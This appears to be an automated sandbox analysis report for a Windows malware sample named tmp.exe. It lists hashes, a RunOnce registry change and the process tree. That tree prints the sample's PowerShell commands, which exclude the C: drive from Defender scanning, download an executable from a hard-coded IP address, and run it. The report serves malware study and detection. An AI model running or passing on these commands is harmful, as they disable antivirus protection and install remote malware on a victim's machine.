Analysis
-
max time kernel
30s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230705-en -
resource tags
arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system -
submitted
07/07/2023, 14:38
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230705-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230703-en
General
-
Target
tmp.exe
-
Size
159KB
-
MD5
631e3a269c0fec1d7c7de2c2e6d49ad4
-
SHA1
70687c4110fea9d1774c9f1487206ce80af9186d
-
SHA256
2e6eec60e1698f2b981cd6ced0c3fdefd1e138fc7b339173a8baaac0f72e693e
-
SHA512
65c9f20640753867795b85434075998fb53bf83cbb2cab1aafd8f9f0786afefbe83028e95dfc82be3db6ee48979e512c777e11c5a6948223313e0b9aa1731a6a
-
SSDEEP
3072:zahKyd2n3165vWp1icKAArDZz4N9GhbkENEkeUrhL6:zahOzp0yN90vE
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmp.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2092 powershell.exe 2220 powershell.exe 2296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3020 wrote to memory of 2004 3020 tmp.exe 27 PID 3020 wrote to memory of 2004 3020 tmp.exe 27 PID 3020 wrote to memory of 2004 3020 tmp.exe 27 PID 2004 wrote to memory of 2092 2004 cmd.exe 29 PID 2004 wrote to memory of 2092 2004 cmd.exe 29 PID 2004 wrote to memory of 2092 2004 cmd.exe 29 PID 2004 wrote to memory of 2220 2004 cmd.exe 30 PID 2004 wrote to memory of 2220 2004 cmd.exe 30 PID 2004 wrote to memory of 2220 2004 cmd.exe 30 PID 2004 wrote to memory of 2296 2004 cmd.exe 31 PID 2004 wrote to memory of 2296 2004 cmd.exe 31 PID 2004 wrote to memory of 2296 2004 cmd.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\cmd.execmd.exe /c "resources.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath "'C:\'"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "wget "http://103.136.199.131:82/asklmdklsmqkl.exe" -outfile "C:\Users\Admin\AppData\Roaming\FgnmkAm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-Expression -Command "C:\Users\Admin\AppData\Roaming\FgnmkAm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
351B
MD52682a06d030068f291bf0181bc8f66b6
SHA1c154ba272ea11225e0596b7f47d556135ad90b43
SHA2562d6110a6f318c2d46bf7a38c07f9b0d95829e28a3888e5023c5e496dfe45c23a
SHA51243c116b85c5767b401f1404d535c15080b99b79ce6678b35c5038001e1d283f0df921df6baebd9b377498b35a74b12bda53989996d3fb683485b6a8b365dedd8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD521777bbd38230dc23ab3664f13e7d726
SHA11146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c
SHA256ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986
SHA512aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD521777bbd38230dc23ab3664f13e7d726
SHA11146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c
SHA256ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986
SHA512aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7G8NRBM0XHI12WFS4PUQ.temp
Filesize7KB
MD521777bbd38230dc23ab3664f13e7d726
SHA11146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c
SHA256ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986
SHA512aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24